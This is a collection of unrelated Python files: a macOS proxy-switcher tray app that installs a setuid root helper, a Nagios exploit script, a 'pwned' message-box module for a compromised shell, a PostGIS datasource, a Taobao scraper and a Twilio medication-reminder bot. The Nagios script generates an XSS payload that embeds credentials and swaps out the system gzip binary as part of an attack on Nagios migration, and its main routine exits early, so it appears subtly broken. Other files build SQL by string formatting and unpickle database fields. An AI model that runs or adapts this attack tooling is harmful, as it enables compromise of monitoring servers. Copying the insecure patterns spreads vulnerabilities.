self.menu.addItem_(menuitem)
self.globalXTunnelMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global Smart-Router', 'enableGlobalSmartRouter:', '')
if proxyState == 'smart_router':
menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.globalSmartRouterMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Disable GAEProxy', 'disableProxy:', '')
if proxyState == 'disable':
menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.disableGaeProxyMenuItem = menuitem
# Reset Menu Item
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Reset Each Module', 'restartEachModule:', '')
self.menu.addItem_(menuitem)
# Default event
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Quit', 'windowWillClose:', '')
self.menu.addItem_(menuitem)
# Bind it to the status item
self.statusitem.setMenu_(self.menu)
# Hide dock icon
AppKit.NSApp.setActivationPolicy_(AppKit.NSApplicationActivationPolicyProhibited)
def updateStatusBarMenu(self):
self.currentServiceMenuItem.setTitle_(getCurrentServiceMenuItemTitle())
# Remove Tick before All Menu Items
self.autoGaeProxyMenuItem.setState_(AppKit.NSOffState)
self.globalGaeProxyMenuItem.setState_(AppKit.NSOffState)
self.globalXTunnelMenuItem.setState_(AppKit.NSOffState)
self.globalSmartRouterMenuItem.setState_(AppKit.NSOffState)
self.disableGaeProxyMenuItem.setState_(AppKit.NSOffState)
# Get current selected mode
proxyState = getProxyState(currentService)
# Update Tick before Menu Item
if proxyState == 'pac':
self.autoGaeProxyMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'gae':
self.globalGaeProxyMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'x_tunnel':
self.globalXTunnelMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'smart_router':
self.globalSmartRouterMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'disable':
self.disableGaeProxyMenuItem.setState_(AppKit.NSOnState)
# Trigger autovalidation
self.menu.update()
def validateMenuItem_(self, menuItem):
return currentService or (menuItem != self.autoGaeProxyMenuItem and
menuItem != self.globalGaeProxyMenuItem and
menuItem != self.globalXTunnelMenuItem and
menuItem != self.globalSmartRouterMenuItem and
menuItem != self.disableGaeProxyMenuItem)
def presentAlert_withTitle_(self, msg, title):
self.performSelectorOnMainThread_withObject_waitUntilDone_('presentAlertWithInfo:', [title, msg], True)
return self.alertReturn
def presentAlertWithInfo_(self, info):
alert = AppKit.NSAlert.alloc().init()
alert.setMessageText_(info[0])
alert.setInformativeText_(info[1])
alert.addButtonWithTitle_("OK")
alert.addButtonWithTitle_("Cancel")
self.alertReturn = alert.runModal() == AppKit.NSAlertFirstButtonReturn
def registerObserver(self):
nc = AppKit.NSWorkspace.sharedWorkspace().notificationCenter()
nc.addObserver_selector_name_object_(self, 'windowWillClose:', AppKit.NSWorkspaceWillPowerOffNotification, None)
def windowWillClose_(self, notification):
executeResult = subprocess.check_output(['networksetup', '-listallnetworkservices'])
services = executeResult.split('\n')
services = filter(lambda service : service and service.find('*') == -1 and getProxyState(service) != 'disable', services) # Remove disabled services and empty lines
if len(services) > 0:
try:
map(helperDisableAutoProxy, services)
map(helperDisableGlobalProxy, services)
except:
disableAutoProxyCommand = ';'.join(map(getDisableAutoProxyCommand, services))
disableGlobalProxyCommand = ';'.join(map(getDisableGlobalProxyCommand, services))
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, disableGlobalProxyCommand)
xlog.info("try disable proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
module_init.stop_all()
os._exit(0)
AppKit.NSApp.terminate_(self)
def config_(self, notification):
host_port = config.get(["modules", "launcher", "control_port"], 8085)
webbrowser.open_new("http://127.0.0.1:%s/" % host_port)
def restartEachModule_(self, _):
module_init.stop_all()
module_init.start_all_auto()
def enableAutoProxy_(self, _):
try:
helperDisableGlobalProxy(currentService)
helperEnableAutoProxy(currentService)
except:
disableGlobalProxyCommand = getDisableGlobalProxyCommand(currentService)
enableAutoProxyCommand = getEnableAutoProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableGlobalProxyCommand, enableAutoProxyCommand)
xlog.info("try enable auto proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
config.set(["modules", "launcher", "proxy"], "pac")
config.save()
self.updateStatusBarMenu()
def enableGlobalProxy_(self, _):
try:
helperDisableAutoProxy(currentService)
helperEnableGlobalProxy(currentService)
except:
disableAutoProxyCommand = getDisableAutoProxyCommand(currentService)
enableGlobalProxyCommand = getEnableGlobalProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, enableGlobalProxyCommand)
xlog.info("try enable global proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
config.set(["modules", "launcher", "proxy"], "gae")
config.save()
self.updateStatusBarMenu()
def enableGlobalXTunnel_(self, _):
try:
helperDisableAutoProxy(currentService)
helperEnableXTunnelProxy(currentService)
except:
disableAutoProxyCommand = getDisableAutoProxyCommand(currentService)
enableXTunnelProxyCommand = getEnableXTunnelProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, enableXTunnelProxyCommand)
xlog.info("try enable global x-tunnel proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
config.set(["modules", "launcher", "proxy"], "x_tunnel")
config.save()
self.updateStatusBarMenu()
def enableGlobalSmartRouter_(self, _):
try:
helperDisableAutoProxy(currentService)
helperEnableSmartRouterProxy(currentService)
except:
disableAutoProxyCommand = getDisableAutoProxyCommand(currentService)
enableSmartRouterCommand = getEnableSmartRouterProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, enableSmartRouterCommand)
xlog.info("try enable global smart-router proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
config.set(["modules", "launcher", "proxy"], "smart_router")
config.save()
self.updateStatusBarMenu()
def disableProxy_(self, _):
try:
helperDisableAutoProxy(currentService)
helperDisableGlobalProxy(currentService)
except:
disableAutoProxyCommand = getDisableAutoProxyCommand(currentService)
disableGlobalProxyCommand = getDisableGlobalProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, disableGlobalProxyCommand)
xlog.info("try disable proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
config.set(["modules", "launcher", "proxy"], "disable")
config.save()
self.updateStatusBarMenu()
def setupHelper():
try:
with open(os.devnull) as devnull:
subprocess.check_call(helper_path, stderr=devnull)
except:
rmCommand = "rm \\\"%s\\\"" % helper_path
cpCommand = "cp \\\"%s\\\" \\\"%s\\\"" % (os.path.join(current_path, 'mac_helper'), helper_path)
chownCommand = "chown root \\\"%s\\\"" % helper_path
chmodCommand = "chmod 4755 \\\"%s\\\"" % helper_path
executeCommand = 'do shell script "%s;%s;%s;%s" with administrator privileges' % (rmCommand, cpCommand, chownCommand, chmodCommand)
xlog.info("try setup helper:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
def getCurrentServiceMenuItemTitle():
if currentService:
return 'Connection: %s' % currentService
else:
return 'Connection: None'
def getProxyState(service):
if not service:
return
# Check if auto proxy is enabled
executeResult = subprocess.check_output(['networksetup', '-getautoproxyurl', service])
if ( executeResult.find('http://127.0.0.1:8086/proxy.pac\nEnabled: Yes') != -1 ):
return "pac"
# Check if global proxy is enabled
executeResult = subprocess.check_output(['networksetup', '-getwebproxy', service])
if ( executeResult.find('Enabled: Yes\nServer: 127.0.0.1\nPort: 8087') != -1 ):
return "gae"
# Check if global proxy is enabled
if ( executeResult.find('Enabled: Yes\nServer: 127.0.0.1\nPort: 1080') != -1 ):
return "x_tunnel"
if ( executeResult.find('Enabled: Yes\nServer: 127.0.0.1\nPort: 8086') != -1 ):
return "smart_router"
return "disable"
# Generate commands for Apple Script
def getEnableAutoProxyCommand(service):
return "networksetup -setautoproxyurl \\\"%s\\\" \\\"http://127.0.0.1:8086/proxy.pac\\\"" % service
def getDisableAutoProxyCommand(service):
return "networksetup -setautoproxystate \\\"%s\\\" off" % service
def getEnableGlobalProxyCommand(service):
enableHttpProxyCommand = "networksetup -setwebproxy \\\"%s\\\" 127.0.0.1 8087" % service
enableHttpsProxyCommand = "networksetup -setsecurewebproxy \\\"%s\\\" 127.0.0.1 8087" % service
return "%s;%s" % (enableHttpProxyCommand, enableHttpsProxyCommand)
def getEnableXTunnelProxyCommand(service):
enableHttpProxyCommand = "networksetup -setwebproxy \\\"%s\\\" 127.0.0.1 1080" % service
enableHttpsProxyCommand = "networksetup -setsecurewebproxy \\\"%s\\\" 127.0.0.1 1080" % service
return "%s;%s" % (enableHttpProxyCommand, enableHttpsProxyCommand)
def getEnableSmartRouterProxyCommand(service):
enableHttpProxyCommand = "networksetup -setwebproxy \\\"%s\\\" 127.0.0.1 8086" % service
enableHttpsProxyCommand = "networksetup -setsecurewebproxy \\\"%s\\\" 127.0.0.1 8086" % service
return "%s;%s" % (enableHttpProxyCommand, enableHttpsProxyCommand)
def getDisableGlobalProxyCommand(service):
disableHttpProxyCommand = "networksetup -setwebproxystate \\\"%s\\\" off" % service
disableHttpsProxyCommand = "networksetup -setsecurewebproxystate \\\"%s\\\" off" % service
return "%s;%s" % (disableHttpProxyCommand, disableHttpsProxyCommand)
# Call helper
def helperEnableAutoProxy(service):
subprocess.check_call([helper_path, 'enableauto', service, 'http://127.0.0.1:8086/proxy.pac'])
def helperDisableAutoProxy(service):
subprocess.check_call([helper_path, 'disableauto', service])
def helperEnableGlobalProxy(service):
subprocess.check_call([helper_path, 'enablehttp', service, '127.0.0.1', '8087'])
subprocess.check_call([helper_path, 'enablehttps', service, '127.0.0.1', '8087'])
def helperEnableXTunnelProxy(service):
subprocess.check_call([helper_path, 'enablehttp', service, '127.0.0.1', '1080'])
subprocess.check_call([helper_path, 'enablehttps', service, '127.0.0.1', '1080'])
def helperEnableSmartRouterProxy(service):
subprocess.check_call([helper_path, 'enablehttp', service, '127.0.0.1', '8086'])
subprocess.check_call([helper_path, 'enablehttps', service, '127.0.0.1', '8086'])
def helperDisableGlobalProxy(service):
subprocess.check_call([helper_path, 'disablehttp', service])
subprocess.check_call([helper_path, 'disablehttps', service])
def loadConfig():
if not currentService:
return
proxy_setting = config.get(["modules", "launcher", "proxy"], "smart_router")
if getProxyState(currentService) == proxy_setting:
return
try:
if proxy_setting == "pac":
helperDisableGlobalProxy(currentService)
helperEnableAutoProxy(currentService)
elif proxy_setting == "gae":
helperDisableAutoProxy(currentService)
helperEnableGlobalProxy(currentService)
elif proxy_setting == "x_tunnel":
helperDisableAutoProxy(currentService)
helperEnableXTunnelProxy(currentService)
elif proxy_setting == "smart_router":
helperDisableAutoProxy(currentService)
helperEnableSmartRouterProxy(currentService)
elif proxy_setting == "disable":
helperDisableAutoProxy(currentService)
helperDisableGlobalProxy(currentService)
else:
xlog.warn("proxy_setting:%r", proxy_setting)
except:
xlog.warn("helper failed, please manually reset proxy settings after switching connection")
sys_tray = MacTrayObject.alloc().init()
currentService = None
def fetchCurrentService(protocol):
global currentService
status = SystemConfiguration.SCDynamicStoreCopyValue(None, "State:/Network/Global/" + protocol)
if not status:
currentService = None
return
serviceID = status['PrimaryService']
service = SystemConfiguration.SCDynamicStoreCopyValue(None, "Setup:/Network/Service/" + serviceID)
if not service:
currentService = None
return
currentService = service['UserDefinedName']
@AppKit.objc.callbackFor(AppKit.CFNotificationCenterAddObserver)
def networkChanged(center, observer, name, object, userInfo):
fetchCurrentService('IPv4')
loadConfig()
sys_tray.updateStatusBarMenu()
# Note: the following code can't run in class
def serve_forever():
app = AppKit.NSApplication.sharedApplication()
app.setDelegate_(sys_tray)
# Listen for network change
nc = AppKit.CFNotificationCenterGetDarwinNotifyCenter()
AppKit.CFNotificationCenterAddObserver(nc, None, networkChanged, "com.apple.system.config.network_change", None, AppKit.CFNotificationSuspensionBehaviorDeliverImmediately)
fetchCurrentService('IPv4')
AppHelper.runEventLoop()
def main():
serve_forever()
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
import argparse
import getpass
import glob
import os
import socket
import subprocess
import time
import sys
script_description = (
"Prepare current system for migrate attack, output XSS payload\n"
"Requires to be run with sudo/root privs for writing files to system dirs"
)
def is_port_open(host='localhost', port=22):
s = socket.socket()
retval = s.connect_ex((host, port))
return retval == 0
gzip_cleanup_command = 'mv `which gzip`.bak `which gzip`'
def cleanup_gzip(verbose=False):
if verbose:
print(f'[*] Cleaning up gzip with: "{gzip_cleanup_command}"')
return os.system(gzip_cleanup_command)
def check_bundle():
bundle_location = '/tmp/nagiosbundle-*.tar.gz'
bundle_glob = glob.glob(bundle_location)
if len(bundle_glob) == 1:
print(f'[+] Attack bundle @ "{bundle_glob[0]}", will be deleted by Nagios during migration.')
elif len(bundle_glob) == 0:
print(f'[!] Bundle creation failed; no files matched "{bundle_location}"')
exit(-1)
elif len(bundle_glob) > 1:
print(f'[!] Multiple matching files for "{bundle_glob}", will cause attack to fail')
print(bundle_glob)
exit(-2)
def check_for_migration():
"""If migration files are found, delete them and return true"""
half_bundle_pattern = '/tmp/nagiosbundle-*.tar'
half_bundles = glob.glob(half_bundle_pattern)
if half_bundles:
for cur_file in half_bundles:
subprocess.run(['rm', cur_file])
return True
else:
return False
def main(ip, username, password, xss_payload_path):
# This script prints its steps and should cause exception on error
subprocess.run('./make_bundle.sh', check=True)
check_bundle()
with open('migrate_xss_template.html') as f:
template_data = f.read()
template_data = template_data.replace('$IP', ip)
template_data = template_data.replace('$USERNAME', username)
template_data = template_data.replace('$PASSWORD', password)
with open(xss_payload_path, 'w') as f:
f.write(template_data)
# If we're in a container, try to print the host path
host_mount = os.getenv('HOST_MOUNT')
guest_mount = os.getenv('GUEST_MOUNT')
if host_mount and guest_mount:
xss_payload_path = xss_payload_path.replace(guest_mount, host_mount)
xss_payload_path += ' (on the host)'
print(f'[+] Wrote populated xss payload to {xss_payload_path}')
#print(f'[ ] NOTE: {xss_payload_path} now contains the password in plaintext')
listening_locally = is_port_open('localhost', 22)
    if listening_locally:
        print('[*] SSH appears to be listening on this host.')
    else:
        print('[!] SSH does not appear to be listening locally.')
cleanup_gzip()
exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
sys.argv[0],
description=script_description,
)
parser.add_argument("attack_server", help="THIS server's IP or Hostname")
parser.add_argument("user", help="Username nagios will log in as (expects root or sudoer)")
parser.add_argument("--password",
help="Password for user (will be written out in plaintext). Will prompt if not provided.")
parser.add_argument("--dont_wait", action='store_true',
help="Don't wait for connection (you'll have to clean up gzip)")
parser.add_argument("--payload_path", default='./xss_migrate_payload.html',
help="Path to write populated XSS payload to")
args = parser.parse_args()
user = args.user
if args.password:
password = args.password
else:
password = getpass.getpass(f'Password for user "{user}": ')
main(args.attack_server, user, password, args.payload_path)
if args.dont_wait:
print('[*] Done. Remember to restore gzip from backup or else tar will be broken!')
print(f' Fix with: {gzip_cleanup_command}')
else:
# This cleans up any leftover files from previous connections
check_for_migration()
print('[*] Listening until payload is executed and migration runs, CTRL+C to exit...')
try:
while True:
time.sleep(1)
if check_for_migration():
# Sleeping an extra bit just to avoid any race possibility
time.sleep(1)
print('[+] Looks like the server connected, payload should have run.')
break
except KeyboardInterrupt:
print('[*] CTRL+C caught')
finally:
retval = cleanup_gzip(verbose=True)
print(f'[*] Return code: {retval}')
print('[*] Done!')
|
nilq/baby-python
|
python
|
import typing
from core import scriptercore
class LinuxDisplayPwnedMsgBox(scriptercore.Scripter):
AUTHOR: str = "Danakane"
def __init__(self):
super(LinuxDisplayPwnedMsgBox, self).__init__()
self.__title__: str = ""
self.__text__: str = ""
self.customize({"title": "The title of the messagebox",
"text": "The message of the messagebox"})
self.configure = self.__doconfig__
def __doconfig__(self, title, text):
self.__title__ = title
self.__text__ = text
def dojob(self) -> None:
        # Quote the injected values so titles/messages containing spaces survive the shell
        self.send(str.format("zenity --error --text \"{0}\" --title \"{1}\" --width=200 &",
                             self.__text__, self.__title__))
blueprint: typing.Callable = LinuxDisplayPwnedMsgBox
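# Usage sketch (assumes the scriptercore.Scripter base wires send() to the
# target shell; values are illustrative):
#   s = blueprint()
#   s.configure(title="Pwned", text="Hello")
#   s.dojob()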
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Example of unpacking/packing containers (cf/epf/ert) using onec_dtools
Functionality is analogous to the C++ version of v8unpack
Copyright (c) 2016 infactum
"""
import argparse
import sys
from onec_dtools import extract, build
def main():
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-U', '--unpack', nargs=2, metavar=('in_filename', 'out_dir_name'))
group.add_argument('-B', '--build', nargs=2, metavar=('in_dir_name', 'out_filename'))
if len(sys.argv) == 1:
parser.print_help()
return 1
args = parser.parse_args()
if args.unpack is not None:
extract(*args.unpack)
if args.build is not None:
build(*args.build)
if __name__ == '__main__':
sys.exit(main())
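# Example invocations (file names are illustrative):
#   python unpack_example.py -U MyForm.epf unpacked/
#   python unpack_example.py -B unpacked/ MyForm.epf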
|
nilq/baby-python
|
python
|
__author__ = "MetaCarta"
__copyright__ = "Copyright (c) 2006-2008 MetaCarta"
__license__ = "Clear BSD"
__version__ = "$Id: VersionedPostGIS.py 496 2008-05-18 13:01:13Z crschmidt $"
from FeatureServer.DataSource import DataSource
from vectorformats.Feature import Feature
from FeatureServer.DataSource.PostGIS import PostGIS
from vectorformats.Formats import WKT
try:
import cPickle
except ImportError:
    import pickle as cPickle
import uuid
class VersionedPostGIS (PostGIS):
"""A proof of concept for versioned PostGIS-powered geo-database support.
Allows 'open tagging', and creates transaction logs for looking through
historical changes to the datastore."""
def __init__(self, name, srid = 4326, srid_out = 4326, fid = "id", geometry = "shape", order = "", **args):
DataSource.__init__(self, name, **args)
self.db = None
self.table = "feature"
self.fid_col = fid
self.geom_col = geometry
self.order = order
self.srid = srid
self.srid_out = srid_out
self.dsn = args["dsn"]
def begin (self):
PostGIS.begin(self)
self.txn_uuid = uuid.uuid1().hex
sql = """INSERT INTO txn (uuid, actor, message, commit_time)
VALUES ('%s', 1, 'message', now());""" % self.txn_uuid
cursor = self.db.cursor()
cursor.execute(str(sql))
def commit (self):
sql = """update txn set bbox = envelope(collect(shape)) from history
where history.txn_id = txn.uuid and txn.uuid = '%s'""" \
% self.txn_uuid
cursor = self.db.cursor()
cursor.execute(str(sql))
PostGIS.commit(self)
def insert (self, action):
feature = action.feature
values = {'geom' : WKT.to_wkt(feature.geometry),
'uuid' : uuid.uuid1().hex,
'attrs': self._serializeattrs(feature.properties)}
sql = """INSERT INTO %s (%s, uuid, attrs)
VALUES (SetSRID(%%(geom)s::geometry, %s),
%%(uuid)s, %%(attrs)s)""" % (
self.table, self.geom_col, self.srid)
cursor = self.db.cursor()
cursor.execute(str(sql), values)
return {}
def update (self, action):
feature = action.feature
sql = """UPDATE %s SET %s = SetSRID(%%(geom)s::geometry, %s),
attrs = %%(attrs)s WHERE %s = %(id)d""" % (
self.table, self.geom_col, self.srid, self.fid_col )
values = {'geom' : WKT.to_wkt(feature.geometry),
'id' : action.id,
'attrs': self._serializeattrs(feature.properties)}
cursor = self.db.cursor()
cursor.execute(str(sql), values)
return self.select(action)
def select (self, action):
cursor = self.db.cursor()
if action.id is not None:
sql = "SELECT AsText(%s) as fs_binary_geom_col, * FROM %s WHERE %s = %%(%s)d" % (
self.geom_col, self.table, self.fid_col, self.fid_col )
cursor.execute(str(sql), {self.fid_col: action.id})
result = [cursor.fetchone()]
else:
filters = []
attrs = {}
if action.bbox:
filters.append( "%s && SetSRID('BOX3D(%f %f,%f %f)'::box3d, %s) and intersects(%s, SetSRID('BOX3D(%f %f,%f %f)'::box3d, %s))" % (
(self.geom_col,) + tuple(action.bbox) + (self.srid,) + (self.geom_col,) + (tuple(action.bbox) + (self.srid,))))
if action.attributes:
match = Feature(props = action.attributes)
filters = self.feature_predicates(match)
attrs = action.attributes
sql = "SELECT AsText(%s) as fs_binary_geom_col, uuid, id, attrs FROM %s" % (self.geom_col, self.table)
#if filters:
# sql += " WHERE " + " AND ".join(filters)
if self.order:
sql += self.order
if action.maxfeatures:
sql += " LIMIT %d" % action.maxfeatures
else:
sql += " LIMIT 1000"
if action.startfeature:
sql += " OFFSET %d" % action.startfeature
cursor.execute(str(sql), attrs)
result = cursor.fetchall() # should use fetchmany(action.maxfeatures)
columns = [desc[0] for desc in cursor.description]
features = []
for row in result:
props = dict(zip(columns, row))
geom = WKT.from_wkt(props['fs_binary_geom_col'])
if props.has_key(self.geom_col): del props[self.geom_col]
del props['fs_binary_geom_col']
props.update(self._deserializeattrs(props['attrs']))
del props['attrs']
fid = props[self.fid_col]
del props[self.fid_col]
for key, value in props.items():
if isinstance(value, str):
props[key] = unicode(value, "utf-8")
features.append( Feature( fid, geom, self.geom_col, self.srid_out, props ) )
return features
def _serializeattrs(self, properties):
import sys
print >>sys.stderr, properties
return cPickle.dumps(properties)
def _deserializeattrs(self, attrstr):
return cPickle.loads(attrstr)
|
nilq/baby-python
|
python
|
import requests as reqs
import base64
import logging
import re
import json
# Call Taobao's image-recognition endpoint to fetch product sources and tags
def taobao_pic_recognize(pic_dir,pic_name,cookie):
# with open(pic_dir+'/'+pic_name, "rb") as f:
    # # b64encode: encode, b64decode: decode
# base64_data = base64.b64encode(f.read())
imagefile={ "file": (pic_name, open(pic_dir+'/'+pic_name, "rb"), "image/%s" % pic_name.split('.')[1])}
header={
'accept': 'application/json, text/javascript, */*; q=0.01',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',
'cookie': cookie,
'origin': 'https://s.taobao.com',
'referer': 'https://s.taobao.com/search?q=&imgfile=&js=1&stats_click=search_radio_all%253A1&initiative_id=staobaoz_20191105&ie=utf8&tfsid=O1CN01g6xEgi1TxE8ft6Nmb_!!0-imgsearch.jpg&app=imgsearch',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-origin',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36',
'x-requested-with': 'XMLHttpRequest'}
res_pic=reqs.post('https://s.taobao.com/image',files=imagefile,headers=header, verify=False)
print(res_pic.json()['name'])
res_alias=reqs.get("""https://s.taobao.com/search?q=&imgfile=&js=1&stats_click=search_radio_all&initiative_id=staobaoz_20191105&ie=utf8&tfsid=%s&app=imgsearch""" % res_pic.json()['name'],{},headers=header,verify=False)
#reg=r'<script>+[\W]+g_page_config = ([\w\W]+"map":{}};);+[\W]+<\/script>'
reg_alias=r'<script>+[\W]+g_page_config = ([\w\W]+"map":{}})+'
m=re.search(reg_alias,res_alias.text,re.M|re.I)
data=json.loads(m.group(1))
# 外观相似宝贝
item = data['mods']['itemlist']['data']['collections'][0]#['auctions'][0]
# 您可能会喜欢
# item = data['mods']['itemlist']['data']['collections'][1]
for i,detail in enumerate(item['auctions']):
if i==3:
break
else:
            print('Product:', detail['title'], detail['pic_url'], detail['detail_url'])
res_detail=reqs.get("https:"+detail['detail_url'],{},headers=header,verify=False)
reg_detail=r'"attributes-list"+([\w\W]+)</ul>+'
m=re.search(reg_detail,res_detail.text,re.M|re.I)
        attrs_text = m.group(1).replace('\t','').replace('"','').replace('\'','').replace(' ','').replace(' ','').replace('\r','').replace('\n','').replace('<li','')
        field_list = attrs_text.split('</li>')
for field in field_list[0:-1]:
try:
f_obj=field.split('>')[-1].split(':')
f_key=f_obj[0]
f_value=f_obj[1]
                print('Attribute:', f_key, f_value)
except Exception as e:
print(e)
pass
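# A minimal usage sketch (not part of the original script): the directory, file
# name, and cookie below are illustrative assumptions; a real logged-in Taobao
# cookie string is required for the requests to succeed.
#
#   taobao_pic_recognize('/tmp/pics', 'example.jpg', cookie='<your taobao cookie>')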
|
nilq/baby-python
|
python
|
from flask import Flask, request, redirect
from twilio.twiml.messaging_response import MessagingResponse
import pandas as pd
import datetime
import pytz
# the below import is only needed for forwarding the sms, in case the client sends KONTAKT
from twilio.rest import Client
account_sid = '######################'
auth_token = '*********************'
client = Client(account_sid, auth_token)
# below is the number that is supposed to send out the sms to one of us, in case a client has sent KONTAKT
happ_num1 = '+14*******'
# below is the number on which we will receive the sms with the message that a client requests KONTAKT
happ_num2 = '+15*******'
app = Flask(__name__)
file_path = '/home/.../dummy_patient_table.txt'
@app.route("/sms", methods=['GET', 'POST'])
def incoming_sms():
"""Send a dynamic reply to an incoming text message"""
    # Get the message and phone number of the user replying back
body = request.values.get('Body', None)
phone_num = request.values.get('From', None)
    # get all the data for this user in a data frame
df0 = pd.read_csv(file_path, dtype={'weekday': str})
df0.reminder_start = pd.to_datetime(df0.reminder_start).dt.tz_localize('UTC').dt.tz_convert('Europe/Sofia')
df0.reminder_stop = pd.to_datetime(df0.reminder_stop).dt.tz_localize('UTC').dt.tz_convert('Europe/Sofia')
df = df0[df0.phone_num == phone_num]
# dictionary below turns the weekday number into weekday names for the messages
num2wday = {0:'пон.', 1:'вт.', 2:'ср.', 3:'четв.', 4:'пет.', 5:'съб.', 6:'нед.'}
# Start our TwiML response
resp = MessagingResponse()
# Determine the right reply for this message
if body == 'INFO':
pass
    # this code word is reserved by twilio, but this can be changed:
    # https://www.twilio.com/docs/sms/services/advanced-opt-out
if body.lower() == 'инфо':
m = 'Вие използвате услугата на Хапп за напомняне на приемане на лекарства.\nЗа спиране на услугата напишете STOP\nЗа да се свържем с Вас обратно - KONTAKT\nЗа списък на всички лекарства с включени напомняния - NAPOMNYANIYA\nЗа достъп до листовката на определено лекарство - INFO-[LEKARSTVO], например INFO-AMIDOFEN\nЗа детайли за всички лекарства, които взимате - LEKARSTVA\nЗа списък на всички лекарства които взимате и сте взимали - ISTORIYA'
resp.message(m)
if body.lower() == 'стоп':
        # set all the reminder flags of this patient to 0 and save the updated df0 to the file
        now_sofia = pytz.timezone("Europe/Sofia").localize(datetime.datetime.now())
        df0.loc[df0.phone_num == phone_num, 'reminder_flag'] = 0
        # update also the column of the stop date with the current date
        df0.loc[df0.phone_num == phone_num, 'reminder_stop'] = now_sofia
        # you also need to update the current working version of the dataframe (df)
        df.loc[df.phone_num == phone_num, 'reminder_flag'] = 0
        df.loc[df.phone_num == phone_num, 'reminder_stop'] = now_sofia
        # write the changes back to the original file itself
        df0.to_csv(file_path, index=False, date_format="%d.%m.%y")
m = 'Вие успешно се отписахте от услугата за напомняния на Хапп. Ако искате да я включите на ново отговорете START'
resp.message(m)
if body.lower() == 'napomnyaniya' or body.lower() == 'напомняния':
# sends messages of the kind:
# За следните лекарства има включени напомняния:
# Амидофен, ден 6 от 14 от услугата: напомняния в 09:00, 15:00, 21:00
# Валериан, ден 3 : 09:00, 17:00, само вторник и петък.
# За спиране на напомнянията отговорете STOP. За да активирате напомняния за допълнителни лекарства, моля отговорете с KONTAKT.
# select only medications with reminder flag == 1
df = df[df.reminder_flag == 1]
df_gr = df.groupby(['medicine','weekday','reminder_start','reminder_stop'])['med_intake_time'].apply(list).reset_index(name='med_intake_time')
str_list = ['За следните лекарства има включени напомняния:\n']
for idx,row in df_gr.iterrows():
# create the string 'frequency' that says what weekdays the customer has to take the medications
if row.weekday == '0123456':
frequency = 'всеки ден'
else:
                frequency = ', '.join(num2wday[int(day_num)] for day_num in row.weekday)  # weekday chars are str digits
# calculate the days since the start of the reminder_start
time_delta = datetime.datetime.now(pytz.timezone('Europe/Sofia')) - row.reminder_start
days_of_service = time_delta.days
med_and_doses = f'{row.medicine}, ден {days_of_service} от услугата: напомняния {frequency} в ' + ', '.join(row.med_intake_time) + '\n'
str_list.append(med_and_doses)
resp.message(''.join(str_list))
if body.lower() == 'lekarstva' or body.lower() == 'лекарства':
#sends message of the kind:
# “Детайли за Вашите лекарства:
# Амидофен, всеки ден, от 06/10/2020 до 14/10/2020: 1 хапче от 2 мг в 09:00, 2 хапчета от 2 мг в 15:00, 1 хапче от 2 мг в 21:00
# Валериан (06/10/2020-14/10/2020, вторник и петък): 1 хапче от 2 мг в 09:00, 1 хапче от 2 мг в 17:00.
# select only medications with reminder flag == 1
df = df[df.reminder_flag == 1]
df['dose+time'] = df.dose + ' в ' + df.med_intake_time
df_gr = df.groupby(['medicine','weekday','reminder_start','reminder_stop'])['dose+time'].apply(list).reset_index(name='dose+time')
str_list = ['Детайли за Вашите лекарства:\n']
for idx,row in df_gr.iterrows():
# create the string 'frequency' that says what weekdays the customer has to take the medications
if row.weekday == '0123456':
frequency = 'всеки ден'
else:
                frequency = ', '.join(num2wday[int(day_num)] for day_num in row.weekday)  # weekday chars are str digits
med_and_doses = f'{row.medicine}, {frequency}, {row.reminder_start.strftime("%d.%m.%y")}-{row.reminder_stop.strftime("%d.%m.%y")}: ' + ', '.join(row['dose+time']) + '\n'
str_list.append(med_and_doses)
resp.message(''.join(str_list))
if body.lower() == 'istoriya' or body.lower() == 'история':
    # is like 'lekarstva' from above, but shows the medications taken previously instead of the current ones
#sends message of the kind:
# “Преди сте приемали следните лекарства:
# Амидофен, всеки ден, от 06/10/2020 до 14/10/2020: 1 хапче от 2 мг в 09:00, 2 хапчета от 2 мг в 15:00, 1 хапче от 2 мг в 21:00
# Валериан (06/10/2020-14/10/2020, вторник и петък): 1 хапче от 2 мг в 09:00, 1 хапче от 2 мг в 17:00.
        # select only medications with reminder flag == 0 (no longer active)
df = df[df.reminder_flag == 0]
df['dose+time'] = df.dose + ' в ' + df.med_intake_time
